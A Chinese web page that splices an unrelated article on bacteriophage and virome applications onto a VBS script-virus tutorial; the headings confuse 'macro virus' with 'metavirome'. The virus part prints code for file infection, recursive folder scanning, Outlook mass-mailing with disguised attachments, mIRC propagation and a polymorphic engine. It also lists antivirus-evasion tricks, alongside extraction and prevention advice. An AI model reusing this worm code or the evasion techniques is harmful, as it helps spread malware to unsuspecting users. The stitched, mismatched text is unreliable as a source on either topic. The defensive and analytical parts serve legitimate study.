宏病毒组分析方法

❶ VBS脚本病毒的病毒原理分析

1．vbs脚本病毒如何感染、搜索文件
VBS脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间，譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部，并在顶部加入一条调用病毒代码的语句，而宏病毒则是直接生成一个文件的副本，将病毒代码拷入其中，并以原文件名作为病毒文件名的前缀，vbs作为后缀。下面我们通过宏病毒的部分代码具体分析一下这类病毒的感染和搜索原理：
以下是文件感染的部分关键代码：
Set fso=createobject(scripting.filesystemobject)
'创建一个文件系统对象
set self=fso.opentextfile(wscript.scriptfullname,1)
'读打开当前文件（即病毒本身）
vbs=self.readall
' 读取病毒全部代码到字符串变量vbs……
set ap=fso.opentextfile(目标文件.path,2,true)
' 写打开目标文件，准备写入病毒代码
ap.write vbs ' 将病毒代码覆盖目标文件
ap.close
set cop=fso.getfile(目标文件.path) '得到目标文件路径
cop.(目标文件.path & .vbs)
' 创建另外一个病毒文件（以.vbs为后缀）
目标文件.delete(true)
'删除目标文件
上面描述了病毒文件是如何感染正常文件的：首先将病毒自身代码赋给字符串变量vbs，然后将这个字符串覆盖写到目标文件，并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本，最后删除目标文件。
下面我们具体分析一下文件搜索代码：
'该函数主要用来寻找满足条件的文件，并生成对应文件的一个病毒副本
sub scan(folder_) 'scan函数定义，
on error resume next '如果出现错误，直接跳过，防止弹出错误窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 当前目录的所有文件集合
for each file in filesext=fso.GetExtensionName(file)
'获取文件后缀
ext=lcase(ext) '后缀名转换成小写字母
if ext=mp5 then '如果后缀名是mp5，则进行感染。
请自己建立相应后缀名的文件，最好是非正常后缀名 ，以免破坏正常程序。
Wscript.echo (file)
end ifnextset subfolders=folder_.subfoldersfor each subfolder in subfolders '搜索其他目录；递归调用
scan( ) scan(subfolder)
next
end sub
上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍，非常巧妙，采用了一个递归的算法遍历整个分区的目录和文件。
2．vbs脚本病毒通过网络传播的几种方式及代码分析
VBS脚本病毒之所以传播范围广，主要依赖于它的网络传播功能，一般来说，VBS脚本病毒采用如下几种方式进行传播：
1）通过Email附件传播
这是一种用的非常普遍的传播方式，病毒可以通过各种方法拿到合法的Email地址，最常见的就是直接取outlook地址簿中的邮件地址，也可以通过程序在用户文档（譬如htm文件）中搜索Email地址。
下面我们具体分析一下VBS脚本病毒是如何做到这一点的：
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject(Outlook.Application)
//创建一个OUTLOOK应用的对象
If outlookApp= Outlook Then
Set mapiObj=outlookApp.GetNameSpace(MAPI)
//获取MAPI的名字空间
Set addrList= mapiObj.AddressLists
//获取地址表的个数
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count
//获取每个地址表的Email记录数
For addrEntIndex= 1 To addrEntCount
//遍历地址表的Email地址
Set item = outlookApp.CreateItem(0)
//获取一个邮件对象实例
Set addrEnt = addr.AddressEntries(addrEntIndex)
//获取具体Email地址
= addrEnt.Address
//填入收信人地址
item.Subject = 病毒传播实验
//写入邮件标题
item.Body = 这里是病毒邮件传播测试，收到此信请不要慌张！
//写入文件内容
Set attachMents=item.Attachments //定义邮件附件
attachMents.Add fileSysObj.GetSpecialFolder(0)& est.jpg.vbs
item.DeleteAfterSubmit = True
//信件提交后自动删除
Then
item.Send
//发送邮件
shellObj.regwrite HKCUsoftwareMailtestmailed, 1
//病毒标记，以免重复感染
End If
NextEnd IfNext
End if
End Function
2）通过局域网共享传播
局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说，为了局域网内交流方便，一定存在不少共享目录，并且具有可写权限，譬如win2000创建共享时，默认就是具有可写权限。这样病毒通过搜索这些共享目录，就可以将病毒代码传播到这些目录之中。
在VBS中，有一个对象可以实现网上邻居共享文件夹的搜索与文件操作。我们利用该对象就可以达到传播的目的。
welcome_msg = 网络连接搜索测试
Set WSHNetwork = WScript.CreateObject(WScript.Network)
’创建一个网络对象
Set oPrinters = WshNetwork.EnumPrinterConnections
’创建一个网络打印机连接列表
WScript.Echo Network printer mappings:
For i = 0 to oPrinters.Count - 1Step2
’显示网络打印机连接情况
WScript.Echo Port &oPrinters.Item(i)
& = & oPrinters.Item(i+1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives
’创建一个网络共享连接列表
If colDrives.Count = 0 Then
MsgBox 没有可列出的驱动器。,
vbInformation + vbOkOnly,welcome_msg
Else
strMsg = 当前网络驱动器连接: &CRLF
Fori=0To colDrives.Count - 1 Step 2
strMsg = strMsg & Chr(13)&Chr(10)&colDrives(i)
& Chr(9)&colDrives(i+1)
Next
MsgBox strMsg, vbInformation + vbOkOnly,
welcome_msg’显示当前网络驱动器连接
End If
上面是一个用来寻找当前打印机连接和网络共享连接并将它们显示出来的完整脚本程序。在知道了共享连接之后，我们就可以直接向目标驱动器读写文件了。
3）通过感染htm、asp、jsp、php等网页文件传播
如今，WWW服务已经变得非常普遍，病毒通过感染htm等文件，势必会导致所有访问过该网页的用户机器感染病毒。
病毒之所以能够在htm文件中发挥强大功能，采用了和绝大部分网页恶意代码相同的原理。基本上，它们采用了相同的代码，不过也可以采用其它代码，这段代码是病毒FSO,WSH等对象能够在网页中运行的关键。在注册表HKEY_CLASSES_ROOTCLSID下我们可以找到这么一个主键，注册表中对它他的说明是“Windows Script Host Shell Object”，同样，我们也可以找到，注册表对它的说明是“FileSystem Object”，一般先要对COM进行初始化，在获取相应的组件对象之后，病毒便可正确地使用FSO、WSH两个对象，调用它们的强大功能。代码如下所示：
Set Apple0bject = document.applets(KJ_guest)Apple0bject.setCLSID()Apple0bject.createInstance() ’创建一个实例
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID()
Apple0bject.createInstance()
’创建一个实例
Set FSO = Apple0bject.Get0bject()
对于其他类型文件，这里不再一一分析。
4）通过IRC聊天通道传播
病毒通过IRC传播一般来说采用以下代码（以MIRC为例）
Dim mirc
set fso=CreateObject(Scripting.FileSystemObject)
set mirc=fso.CreateTextFile(C:mircscript.ini)
’创建文件script.ini
fso.CopyFile Wscript.ScriptFullName, C:mircattachment.vbs,
True ’将病毒文件备份到attachment.vbs
mirc.WriteLine [script]
mirc.WriteLine n0=on 1:join:*.*:
{if($nick !=$me) /dcc send $nick C:mircattachment.vbs }
'利用命令/ddc send $nick attachment.vbs给通道中的其他用户传送病毒文件
mirc.Close
以上代码用来往Script.ini文件中写入一行代码，实际中还会写入很多其他代码。Script.ini中存放着用来控制IRC会话的命令，这个文件里面的命令是可以自动执行的。譬如，TUNE.VBS病毒就会修改c:mircscript.ini 和 c:mircmirc.ini，使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。同样，如果Pirch98已安装在目标计算机的c:pirch98目录下，病毒就会修改c:pirch98events.ini和c:pirch98pirch98.ini，使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。
另外病毒也可以通过现在广泛流行的KaZaA进行传播。病毒将病毒文件拷贝到KaZaA的默认共享目录中，这样，当其他用户访问这台机器时，就有可能下载该病毒文件并执行。这种传播方法可能会随着KaZaA这种点对点共享工具的流行而发生作用。
还有一些其他的传播方法，我们这里不再一一列举。
3．VBS脚本病毒如何获得控制权
如何获取控制权？这一个是一个比较有趣的话题，而VBS脚本病毒似乎将这个话题发挥的淋漓尽致。笔者在这里列出几种典型的方法：
1）修改注册表项
windows在启动的时候，会自动加载HKEY_LOCAL_项下的各键值所执向的程序。脚本病毒可以在此项下加入一个键值指向病毒程序，这样就可以保证每次机器启动的时候拿到控制权。vbs修改注册表的方法比较简单，直接调用下面语句即可。 wsh.RegWrite(strName, anyvalue [,strType])
2）通过映射文件执行方式
譬如，我们新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码。
3）欺骗用户，让用户自己执行
这种方式其实和用户的心理有关。譬如，病毒在发送附件时，采用双后缀的文件名，由于默认情况下，后缀并不显示，举个例子，文件名为beauty.jpg.vbs的vbs程序显示为beauty.jpg，这时用户往往会把它当成一张图片去点击。同样，对于用户自己磁盘中的文件，病毒在感染它们的时候，将原有文件的文件名作为前缀，vbs作为后缀产生一个病毒文件，并删除原来文件，这样，用户就有可能将这个vbs文件看作自己原来的文件运行。
4）desktop.ini和folder.htt互相配合
这两个文件可以用来配置活动桌面，也可以用来自定义文件夹。如果用户的目录中含有这两个文件，当用户进入该目录时，就会触发folder.htt中的病毒代码。这是新欢乐时光病毒采用的一种比较有效的获取控制权的方法。并且利用folder.htt，还可能触发exe文件，这也可能成为病毒得到控制权的一种有效方法！
病毒获得控制权的方法还有很多，这方面作者发挥的余地也比较大。
4．vbs脚本病毒对抗反病毒软件的几种技巧
病毒要生存，对抗反病毒软件的能力也是必需的。一般来说，VBS脚本病毒采用如下几种对抗反病毒软件的方法：
1）自加密
譬如，新欢乐时光病毒，它可以随机选取密钥对自己的部分代码进行加密变换，使得每次感染的病毒代码都不一样，达到了多态的效果。这给传统的特征值查毒法带来了一些困难。病毒也还可以进一步的采用变形技术，使得每次感染后的加密病毒的解密后的代码都不一样。
下面看一个简单的vbs脚本变形引擎(来自flyshadow)
Randomize
Set Of = CreateObject(Scripting.FileSystemObject)
’创建文件系统对象
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall
’读取自身代码
fS=Array(Of, vC, fS, fSC)
’定义一个即将被替换字符的数组
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65))
& Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65))
& Chr((Int(Rnd * 22) + 65)))
’取4个随机字符替换数组fS中的字符串
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC ’将替换后的代码写回文件
上面这段代码使得该VBS文件在每次运行后，其Of，vC，fS，fSC四字符串都会用随机字符串来代替，这在很大程度上可以防止反病毒软件用特征值查毒法将其查出。
2）巧妙运用Execute函数
用过VBS程序的朋友是否会觉得奇怪：当一个正常程序中用到了FileSystemObject对象的时候，有些反病毒软件会在对这个程序进行扫描的时候报告说此Vbs文件的风险为高，但是有些VBS脚本病毒同样采用了FileSystemObject对象，为什么却又没有任何警告呢？原因很简单，就是因为这些病毒巧妙的运用了Execute方法。有些杀毒软件检测VBS病毒时，会检查程序中是否声明使用了FileSystemObject对象，如果采用了，这会发出报警。如果病毒将这段声明代码转化为字符串，然后通过Execute(String)函数执行，就可以躲避某些反病毒软件。
3）改变某些对象的声明方法
譬如fso=createobject(scripting.filesystemobject)，我们将其改变为
fso=createobject(script+ing.filesyste+mobject)，这样反病毒软件对其进行静态扫描时就不会发现filesystemobject对象。
4）直接关闭反病毒软件
VBS脚本功能强大，它可以直接在搜索用户进程然后对进程名进行比较，如果发现是反病毒软件的进程就直接关闭，并对它的某些关键程序进行删除。
5．Vbs病毒生产机的原理介绍
所谓病毒生产机就是指可以直接根据用户的选择产生病毒源代码的软件。在很多人看来这或许不可思议，其实对脚本病毒而言它的实现非常简单。
脚本语言是解释执行的、不需要编译，程序中不需要什么校验和定位，每条语句之间分隔得比较清楚。这样，先将病毒功能做成很多单独的模块，在用户做出病毒功能选择后，生产机只需要将相应的功能模块拼凑起来，最后再作相应的代码替换和优化即可。由于篇幅关系和其他原因，这里不作详细介绍。
三、如何防范vbs脚本病毒
1．如何从样本中提取（加密）脚本病毒
对于没有加密的脚本病毒，我们可以直接从病毒样本中找出来，现在介绍一下如何从病毒样本中提取加密VBS脚本病毒，这里我们以新欢乐时光为例。
用JediEdit打开folder.htt。我们发现这个文件总共才93行，第一行，几行注释后，以开始，节尾。相信每个人都知道这是个什么类型的文件吧！
第87行到91行，是如下语句：
87：
第87和91行不用解释了，第88行是一个字符串的赋值，很明显这是被加密过的病毒代码。看看89行最后的一段代码ThisText = ThisText & TempChar，再加上下面那一行，我们肯定能够猜到ThisText里面放的是病毒解密代码（熟悉vbs的兄弟当然也可以分析一下这段解密代码，too simple!就算完全不看代码也应该可以看得出来的)。第90行是执行刚才ThisText中的那段代码（经过解密处理后的代码）。
那么，下一步该怎么做呢？很简单，我们只要在病毒代码解密之后，将ThisText的内容输出到一个文本文件就可以解决了。由于上面几行是vbscript,于是我创建了如下一个.txt文件：
首先，第88、89两行到刚才建立的.txt文件，当然如果你愿意看看新欢乐时光的执行效果，你也可以在最后输入第90行。然后在下面一行输入创建文件和将ThisText写入文件vbs代码，整个文件如下所示：
ExeString = Afi...’ 第88行代码
Execute(Dim KeyAr... ’ 第89行代码
set fso=createobject(scripting.filesystemobject)
’ 创建一个文件系统对象
set virusfile=fso.createtextfile(resource.log,true)
’ 创建一个新文件resource.log，
用以存放解密后的病毒代码 virusfile.writeline(ThisText)
’ 将解密后的代码写入resource.log
OK！就这么简单，保存文件，将该文件后缀名.txt改为.vbs(.vbe也可以)，双击，你会发现该文件目录下多了一个文件resource.log，打开这个文件，怎么样？是不是“新欢乐时光”的源代码啊！
2．vbs脚本病毒的弱点
vbs脚本病毒由于其编写语言为脚本，因而它不会像PE文件那样方便灵活，它的运行是需要条件的（不过这种条件默认情况下就具备了）。笔者认为，VBS脚本病毒具有如下弱点：
1）绝大部分VBS脚本病毒运行的时候需要用到一个对象：FileSystemObject
2）VBScript代码是通过Windows Script Host来解释执行的。
3）VBS脚本病毒的运行需要其关联程序Wscript.exe的支持。
4）通过网页传播的病毒需要ActiveX的支持
5）通过Email传播的病毒需要OE的自动发送邮件功能支持，但是绝大部分病毒都是以Email为主要传播方式的。
3．如何预防和解除vbs脚本病毒
针对以上提到的VBS脚本病毒的弱点，笔者提出如下集中防范措施：
1）禁用文件系统对象FileSystemObject
方法：用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。其中regsvr32是WindowsSystem下的可执行文件。或者直接查找scrrun.dll文件删除或者改名。
还有一种方法就是在注册表中HKEY_CLASSES_ROOTCLSID下找到一个主键的项，咔嚓即可。
2）卸载Windows Scripting Host
在Windows 98中（NT 4.0以上同理），打开[控制面板]→[添加/删除程序]→[Windows安装程序]→[附件]，取消“Windows Scripting Host”一项。
和上面的方法一样，在注册表中HKEY_CLASSES_ROOTCLSID下找到一个主键的项，咔嚓。
3）删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射
点击[我的电脑]→[查看]→[文件夹选项]→[文件类型]，然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射。
4）在Windows目录中，找到WScript.exe，更改名称或者删除，如果你觉得以后有机会用到的话，最好更改名称好了，当然以后也可以重新装上。
5）要彻底防治VBS网络蠕虫病毒，还需设置一下你的浏览器。我们首先打开浏览器，单击菜单栏里“Internet 选项”安全选项卡里的[自定义级别]按钮。把“ActiveX控件及插件”的一切设为禁用，这样就不怕了。呵呵，譬如新欢乐时光的那个ActiveX组件如果不能运行，网络传播这项功能就玩完了。
6）禁止OE的自动收发邮件功能
7）由于蠕虫病毒大多利用文件扩展名作文章，所以要防范它就不要隐藏系统中已知文件类型的扩展名。Windows默认的是“隐藏已知文件类型的扩展名称”，将其修改为显示所有文件类型的扩展名称。
8）将系统的网络连接的安全级别设置至少为“中等”，它可以在一定程度上预防某些有害的Java程序或者某些ActiveX组件对计算机的侵害。
9）呵呵，最后一项不说大家也应该知道了，杀毒软件确实很必要，尽管有些杀毒软件挺让广大用户失望，不过，选择是双方的哦。在这个病毒横飞的网络，如果您的机器没有装上杀毒软件我觉得确实挺不可思议的。
四、对所有脚本类病毒发展的展望
随着网络的飞速发展，网络蠕虫病毒开始流行，而VBS脚本蠕虫则更加突出，不仅数量多，而且威力大。由于利用脚本编写病毒比较简单，除了将继续流行目前的VBS脚本病毒外，将会逐渐出现更多的其它脚本类病毒，譬如PHP，JS，Perl病毒等。但是脚本并不是真正病毒技术爱好者编写病毒的最佳工具，并且脚本病毒解除起来比较容易、相对容易防范。笔者认为，脚本病毒仍将继续流行，但是能够具有像宏病毒、新欢乐时光那样大影响的脚本蠕虫病毒只是少数。

❷ 宏病毒组学｜病毒组的应用

噬菌体在自然环境中的意义在于它们能够在宿主体内复制，从而影响细菌群落的多样性，在人体内，噬菌体的作用是保护人体免受致病菌的侵袭；海水中含有4´1030种病毒，这使其成为最大的噬菌体库；土壤噬菌体具有影响其养分循环及植物根系与细菌之间的共生关系的功能。在人工环境中，噬菌体介导细菌生长的能力可以被开发为多种用途，由于其特殊性导致它们可以轻易地被基因改造；在废水处理中，噬菌体可以用来影响现有的细菌群落，从而提高处理效率；在工业上，噬菌体的应用主要为控制食源性病原体和减少石油工业中问题细菌的数量(图1)。

病毒组在农业领域的应用

最初，噬菌体疗法主要应用在医学领域，即对感染人类的相关致病细菌进行治疗。40至50年前，噬菌体疗法作为控制植物病原体的手段，在农业环境中被广泛探索。在这些试验中出现了两个主要问题: (1)病原菌产生的胞外多糖阻止了噬菌体的吸附，(2)菌株之间存在不同程度的敏感性。随着对病毒组学研究的深入，使用噬菌体疗法来控制植物性细菌病原体的生长已经被越来越多地探索。近年来，在土壤-植物(作物/蔬菜/果树)体系中引入“农业噬菌体疗法”(agricultural phage therapy)来灭活致病细菌的研究也得到了发展(图2)。显而易见，噬菌体疗法(也称为噬菌体生物防治)的一个优点便是减少了对病原体使用化学制剂，这避免了与环境污染、生态系统破坏和作物残留化学物质有关的问题。

土壤“病”了，给农作物供应再多养分也没有意义，土壤微生态失衡被视为农业领域亟待解决的重要难题。青枯菌( Ralstonia solanacearum )是世界范围内最具有毁灭性的植物病原菌之一，由于其致死性和持久性强，并且具有广泛的宿主范围以及广阔的地理分布，受该菌侵袭的土壤经常发生作物减产，甚至绝收的情况，由此造成的经济损失不可估量。 Akiko Fujiwara 等研究发现溶解性噬菌体(FRSL1)对青枯菌具有生物防治作用( Akiko Fujiwara , et al, 2011 )(图3)。

当然，为了提高噬菌体在生物防治中的抗菌效果，必须深入了解噬菌体生态学以及各种环境下噬菌体与宿主之间复杂的相互作用。这些噬菌体及其宿主细菌的基因组信息将有助于了解噬菌体的特性、噬菌体与细菌相互作用的历史和分子机制。

病毒组在生态环境领域的应用

从大的方面来讲，环境病毒的生态功能主要有三方面( 王光华， 2017 )(1)调控寄主群落结构。众所周知，自然生态系统中有两种主要现象调控微生物群落结构，即从底向上(Bottom-up)和从上而下(Top-down)的两个生态过程( Lenoir L,et al, 2007 and  Thomas WC, et al, 2013)。噬菌体调控细菌群落结构是一种经典的 Top-down 调控，虽然学术界意识到该调控作用的重要性，但目前对这一调控过程的研究还处于黑箱状态，已有的报道主要是针对特定噬菌体及其寄主的动态变化( Ashelford K E, et al, 2009 )，尚缺乏群落水平的研究结果。Allen( Allen B, et al, 2013 )等人以茶提取物作为噬菌体抑制剂添加到阿拉斯加土壤中，发现添加茶提取物在显着降低土壤中噬菌体数量的同时，也增加了微生物生物量和土壤呼吸速率，但该文对细菌群落结构是否产生影响没有报道。(2)直接或间接参与元素地球化学循环。病毒的这种作用体现在它的感染率、致死率、病毒的周转时间以及其巨大病毒数量上。病毒感染在引起寄主细胞死亡裂解的同时，也促发寄主细胞营养元素释放到环境中去，进而促进了元素的生物化学循环，这种由病毒介导的食物链传递方式叫做 Viral loop。有报道指出，在海洋中由病毒推动的碳环量占该生态系统碳循环总量的6%—26%( Weinbauer MG ， 2004 )。但与此相对应的土壤病毒，特别是土壤噬菌体在多大程度上促进了元素循环还未见报道。(3)作为基因水平移动的媒介。这个功能不难理解，正是病毒与寄主的共进化推动了地球生物群落不断演替，形成了如此多样性的地球生态系统( Thingstad TF, et al, 1997 )。

在调控寄主群落结构方面，通过噬菌体控制细菌宿主，并以此减缓耐抗生素细菌的繁殖，受到越来越多的关注。在与细菌共同进化了数十亿年之后，噬菌体拥有了独特的感染宿主的能力，这使其能够在对微生物群落的其他部分几乎没有影响的前提下，控制有问题的细菌。与抗生素或杀菌剂不同，噬菌体可以继续复制并感染目标细菌，因此，部分学者认为可将基于噬菌体的微生物控制应用领域扩展到生态环境保护，比如在废水处理时减缓废水处理厂(wastewater treatment Plants,WWTPs)中耐抗生素细菌(antibiotic-resistant bacteria, ARB)的扩散。通常分离的窄价(narrow-host-range)噬菌体的感染性在加入到活性污泥后就会迅速下降，而多价(broad-host-range)噬菌体在活性污泥的微观世界中增殖极快，特别是当与它们的其宿主一起加入时。Pedro等利用非致病性生产宿主(Pseudomonas putida)培养多价噬菌体(PER01和PER02)，并测试宿主噬菌体混合物在活性污泥微环境中抑制耐多药(耐内酰胺)大肠杆菌NDM-1的能力，此外，他们对窄价大肠杆菌噬菌体鸡尾酒(MER01和MER02)也进行了测试，以作为对照(图4)。研究发现在抑制耐抗生素细菌模型方面，多价噬菌体鸡尾酒(PER01和PER02)明显比窄价大肠杆菌鸡尾酒(MER01 and MER02)更有效。在实验中， β -耐乳糖大肠杆菌NDM-1的最初浓度为6.2±0.1 log10 CFU(菌落形成单位colony-forming units)/mL，5天后，经多价噬菌体鸡尾酒处理的NDM-1浓度显着降低至3.8±0.2 log10 CFU/mL，而大肠杆菌鸡尾酒处理后浓度为4.7±0.3 log10 CFU/mL。由于存在替代宿主，多价噬菌体能够达到更大的密度，以增加耐抗生素细菌感染的可能性。含有blaNDM-1抗性基因且存活的大肠杆菌的比例(0.57±0.07)显着低于对照组(0.74±0.08)。因此，由非致病性宿主安全生产的多价噬菌体可以提供一种新的方法来控制废水处理厂中的耐抗生素细菌，并减缓相关耐药基因在环境中的繁殖和释放(图4)。

不仅如此，Pedro等的研究结果表明，多价噬菌体可以特异性控制目标细菌，而对活性污泥的活性几乎没有影响(以耗氧量衡量)。重要的是，多价噬菌体可以利用多个宿主，因此可以避免在生产过程中需要利用病原性或难以培养的宿主。传统的窄价噬菌体必须使用细菌靶标来生产，这可能产生重大的安全问题。此外，由于多价噬菌体可以在良性宿主中产生，因此在使用前可能不需要从宿主中提纯它们(图5)，从而大大节省了资金和运营成本。

与任何抗菌剂一样，噬菌体必须达到足够的浓度(即必须达到适当的噬菌体与宿主的比例，也称为感染复数(multiplicity of infection,MOI)，才能确保有效的微生物控制。然而，废水中活性污泥组成非常复杂，在感染宿主之前，噬菌体可能会因吸附污泥絮凝体、悬浮颗粒和共生菌而被去除。此外，环境压力，如太阳辐射和极端温度、盐度和pH值，也可能减少噬菌体数量和阻碍感染。总的来说，噬菌体的效价是两个相反过程的结果：生产性感染后的噬菌体复制和各种应激源引起的噬菌体衰变，表明噬菌体在增殖和抑制废水处理厂(wastewater treatment Plants,WWTPs )耐抗生素细菌(antibiotic-resistant bacteria,ARB)方面的能力仍需增强，这对于减少耐抗生素细菌对环境的排放是极为重要的。

也有研究通过对比宿主特异性性噬菌体、噬菌体鸡尾酒和多价噬菌体三者对土壤中ARPB和ARGs的抑制效果。发现在各种噬菌体处理中，鸡尾酒噬菌体对土壤和胡萝卜组织中ARPB/ARG耗散作用最显着，其次是多价噬菌体和宿主特异性噬菌体处理，但是多价噬菌体在维持土壤和胡萝卜组织中微生物群落的生态功能方面优于鸡尾酒噬菌体处理(图6) ( Ye Mao,  et al, 2017 )。

病毒组在医药领域的应用

噬菌体疗法指的是将噬菌体作为生物制剂来杀灭目标细菌。溶解性噬菌体开始感染宿主时，吸附在细菌宿主表面的特定受体上，这些受体可能位于革兰氏阳性或阴性细胞壁，以及多糖胶囊，甚至附属物如菌毛和鞭毛上。噬菌体和细菌受体之间的锁钥关系通常决定了病毒能够感染的宿主范围，具有特征性的噬菌体受体的数量也在不断增加。吸附后，病毒将其遗传物质释放到宿主体内，大多数与人类病原体相关的裂解噬菌体属于尾状病毒科和微病毒科，具有双链或单链DNA基因组( Lin DM , et al, 2017 )。接下来，病毒接管细菌的复制机制，创造下一代噬菌体，复制持续到噬菌体编码的蛋白质被激活，以裂解细胞，有效地杀死宿主，并允许新合成的病毒逃逸，重新启动周期。尽管噬菌体不是活的有机体，但它们确实是动态的实体，而溶解周期是噬菌体疗法的基石。相比之下，抗生素是一种只能选择性破坏细菌某些生理过程(如蛋白质或细胞壁合成)的化学物质，和噬菌体的作用机制存在很大的差异(表1)。1915年和1917年噬菌体被发现后( O’Flaherty S, et al, 2009 )，即被提议用于治疗人类细菌感染。目前，已经证实了实验性噬菌体治疗由革兰氏阴性菌(包括铜绿假单胞菌，伯克霍尔德氏菌( Burkholderia cenocepacia )和肺炎克雷伯菌( Klebsiella pneumoniae )所引起肺炎的有效性( O’Flaherty S, et al, 2009)，动物模型也证明噬菌体可以作为注射剂来治疗全身败血症感染，而应用噬菌体治疗人类局部感染也取得了成功的结果( Rhoads DD , et al, 2009 and Wright A)。随着其在治疗中补充或替代抗生素的潜力的推进，预计未来将有更多的临床试验和多样化的应用。

甲氧西林金黄色葡萄球菌(MRSA)引起的呼吸道感染可发展为致命的全身感染，噬菌体疗法有望对这些严重感染有效。在利用噬菌体对严重败血症的葡萄球菌呼吸道感染进行治疗时发现，噬菌体S130的使用总体上降低了金黄色葡萄球菌密度，并且在不同组织(例如肝，脾，血和肺)中存在显着的噬菌体复制，实验小鼠感染后6小时腹腔注射噬菌体可减轻其感染的严重程度。在肺中，噬菌体裂解可能在没有生物分子抑制的情况下发生，因为在肺中检测到显着更高的噬菌体浓度。此外，在肺支气管肺泡灌洗液(bronchoalveolar lavage fluid,BALF)的噬菌体裂解实验中未观察到抑制作用。这些结果可能的解释为：金黄色葡萄球菌在小鼠模型的肺中分布不均匀，并且在肺组织的选择中存在取样偏差。而在一位左胫骨感染了XDR Acinetobacter baumannii 和 MDR Klebsiella pneumoniae的病例中，噬菌体和抗生素进行的联合治疗能有效对其症状进行控制( Ran N P ， et al, 2009 )。

人类刚刚开始扩展噬菌体的用途，尚存在一些技术上的困难( O’Flaherty S, et al, 2009and Lu TK, et al, 2011 )。例如，与将任何药剂配制成半固体剂型(如乳膏或软膏)，将噬菌体掺入转移载体中使得整个最终产品具有均匀性是非常重要的，这确保了药物的一致性。另一方面，与其他药物不同，噬菌体是依赖于其结构完整性的大型生物实体，它们的尾巴也有一定的生物功能。最近在欧洲的PhagoBurn临床试验( Jault P , et al, 2019)中观察到噬菌体结构完整性对于治疗应用是非常重要的，据报道，噬菌体治疗效果不佳，可能是由于在制备治疗敷料期间对病毒的物理损伤造成的(图7)。噬菌体给药导致某些受试者产生噬菌体中和抗体，可能也会使噬菌体治疗无法达到预期的效果。为了促进噬菌体疗法的多功能临床应用，噬菌体和噬菌体疗法的研究应旨在通过开发基于现代科学技术的下一代噬菌体疗法来克服技术障碍，在本书特别篇——噬菌体疗法中会进行详细分析。

传统培养方法只能以已知的病毒为目标，很难发现新病毒，而宏病毒组的方法则结合了新一代测序技术以及随机PCR技术，能够挖掘大量未知病毒， 而且不需要分离培养，这为部分高分散、低丰度的病毒系统分析和鉴定提供了新的途径。我国拥有十分丰富的生物资源，在病毒领域的挖掘潜力极大，这对于我国的宏病毒组学研究是一种得天独厚的优势，研究人员借助宏病毒组学的方法已成功地从不同环境样本（人体、自然及人工环境）中鉴定出了多种病毒，这使人们了解到不同的病毒构成及其中间宿主的病毒携带状况，不仅丰富了病毒库，同时也增加了人们对病毒分布以及多样性的认识，进而更能有效地防治病毒的侵袭。此外，利用宏病毒组实时去监控致病性病毒及潜在致病病毒的变化情况，有助于分析新的或尚不明病原体的疾病，对快速检验突发的病毒性公共卫生事件意义重大。

未来在病毒组学方面，宏病毒基因组学将成为强力工具。目前，环境中病毒功能探索仅仅局限于序列筛选。但随着测序技术等新技术的发展，宏病毒组学足以更广泛和精确地应用在病毒相关领域。总之，宏病毒组学的发展必将突破传统技术瓶颈，在未来展现其的优势。

参考文献

Allen B, Willner D, Oechel WC, et al. Top-down control of microbial activity and biomass in an Arctic soilecosystem. Environmental Microbiology, 2009, 12(3): 642-648.

Ashelford KE, Fry J C, BaileyM J, et al. Characterization of six bacteriophages of Serratia liquefaciens CP6isolated from sugar beet phytosphere. Applied and Environmental Microbiology,1999, 65(5): 1959-1965.

BatinovicS, Wassef F, Knowler SA, et al. Bacteriophages inNatural and Artificial Environments[J]. Pathogens. 2019,8(3).

Fujiwara A, Fujisawa M, Hamasaki R, et al. Biocontrol of Ralstoniasolanacearum by treatment with lytic bacteriophages[J]. Appl Environ Microbiol.2011 Jun;77(12):4155-62.

Gordillo Altamirano FL, BarrJJ. Phage Therapy in the Postantibiotic Era. Clin Microbiol Rev. 2019 Apr;32(2)pii: 32/2/e00066-18.

Jault P, Leclerc T, Jennes S,et al. Efficacyand tolerability of a cocktail of bacteriophages to treat burn wounds infectedby Pseudomonas aeruginosa (PhagoBurn): A randomised, controlled, double-blindphase 1/2 trial. Lancet Infect. Dis. 2019, 19, 35–45.

Lenoir L, Persson T, BengtssonJ, et al. Bottom–up or top–down control in forest soil microcosms? Effects ofsoil fauna on fungal biomass and C/N mineralization. Biology and Fertility ofSoils, 2007, 43(3): 281-294.

Lin DM, Koskella B, Lin HC.2017. Phage therapy: an alternative to antibiotics in the age of multi-drugresistance. World J Gastrointest Pharmacol Ther 8:162-173.

Lu TK, Koeris MS. The nextgeneration of bacteriophage therapy. Curr Opin Microbiol 2011; 14: 524e31.

Matsuzaki S, Uchiyama J,Takemura-Uchiyama I, Daibata M. Perspective: The age of the phage. Nature. 2014May 1;509(7498):S9. pii: 509S9a.

O’Flaherty S, Ross RP, CoffeyA. Bacteriophage and their lysins for elimination of infectious bacteria[J].FEMS Microbiol Rev 2009; 33:801e19

Ran NP, Daniel G, Ayman K, etal. Successful Treatment of Antibiotic-resistant, Poly-microbial Bone InfectionWith Bacteriophages and Antibiotics Combination[J]. Clinical InfectiousDiseases, 2019(11):11.

